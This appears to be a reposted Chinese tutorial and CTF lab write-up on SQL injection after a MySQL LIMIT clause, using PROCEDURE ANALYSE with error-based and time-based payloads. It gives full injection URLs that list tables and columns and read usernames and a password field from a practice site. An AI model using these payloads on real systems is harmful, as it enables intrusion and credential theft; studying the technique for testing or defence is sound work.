碼上歡樂
相關內容    簡體    繁體

Mysql下Limit注入方法(此方法僅適用於5.0.0

本文轉載自   查看原文   2017-07-27 19:47   1752    SQL注入

SQL語句類似下面這樣:(此方法僅適用於5.0.0<mysql<5.6.6的版本)

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT (注入點)

  問題的關鍵在於,語句中有 order by 關鍵字,mysql 中在 order by 前面可以使用 union 關鍵字,所以如果注入點前面沒有 order by 關鍵字,就可以使用 union 關鍵字,但是現在的情況是,注入點前面有 order by 關鍵字。

我們先看看 mysql 5.x 的文檔中的 select 的語法:

 1 SELECT
 2     [ALL | DISTINCT | DISTINCTROW ]
 3       [HIGH_PRIORITY]
 4       [STRAIGHT_JOIN]
 5       [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
 6       [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
 7     select_expr [, select_expr ...]
 8     [FROM table_references
 9     [WHERE where_condition]
10     [GROUP BY {col_name | expr | position}
11       [ASC | DESC], ... [WITH ROLLUP]]
12     [HAVING where_condition]
13     [ORDER BY {col_name | expr | position}
14       [ASC | DESC], ...]
15     [LIMIT {[offset,] row_count | row_count OFFSET offset}]
16     [PROCEDURE procedure_name(argument_list)]
17     [INTO OUTFILE 'file_name' export_options
18       | INTO DUMPFILE 'file_name'
19       | INTO var_name [, var_name]]
20     [FOR UPDATE | LOCK IN SHARE MODE]]

 

在LIMIT后面可以跟兩個函數,PROCEDURE 和 INTO,INTO除非有寫入shell的權限,否則是無法利用的,這里的重點是 PROCEDURE 關鍵字.MySQL默認可用的存儲過程只有 ANALYSE。

嘗試用這個存儲過程:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
 
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE支持兩個參數,試試兩個參數:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
 
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

在 ANALYSE 中插入 sql 語句,sleep 沒有被執行,可以使用報錯注入:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

如果不支持報錯注入的話,還可以基於時間注入,直接使用sleep不行,需要用BENCHMARK代替:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

 

例子:(來自 網絡安全實驗室|網絡信息安全攻防學習平台 注入關第四題:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1

1.使用 PROCEDURE ANALYSE:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0%20PROCEDURE%20ANALYSE(1)%23&num=1

Can't use ORDER clause with this procedure
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

2.使用報錯注入爆表:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=8&num=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()))),1)%23

XPATH syntax error: ':article,user'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

得到表名:article,user

3.爆列:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x61727469636c65))),1)%23%20&num=100%20%23

XPATH syntax error: ':id,title,contents,isread'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

得到article表的列名:id,title,contents,isread

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x75736572))),1)%23%20&num=100%20%23

XPATH syntax error: ':id,username,password,lastloginI'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

同樣得到user表的列名:id,username,password,lastloginI

4.爆字段:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(username)%20from%20user))),1)%23%20&num=1

XPATH syntax error: ':user,admin,flag'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

通過查詢user表的username列,發現其中有一個字段是flag,那么直接讀取flag字段的內容就可以了:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(password)%20from%20user%20where%20username=0x666c6167))),1)%23%20&num=1

XPATH syntax error: ':myflagishere'
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

得到flag:myflagishere

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 mysql卸載(win10 適用於想更換版本的) 修改IP永久生效方法【適用於ubuntu 16 及其早期版本】 HTTPS證書生成方法,也適用於APP 關於Pycharm的jetbrains-agent.jar插件的正確使用方法(僅適用於舊版本)分析 vue項目Cesium配置詳解(適用於Cesium1.60以上版本) Debian最完美安裝flash的教程//適用於所有linux版本 AES加密(適用於java 和.net) 打造適用於c#的feign pip換源(適用於cmd) ENSP windows10系統下的安裝教程(也適用於大多數windows11)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM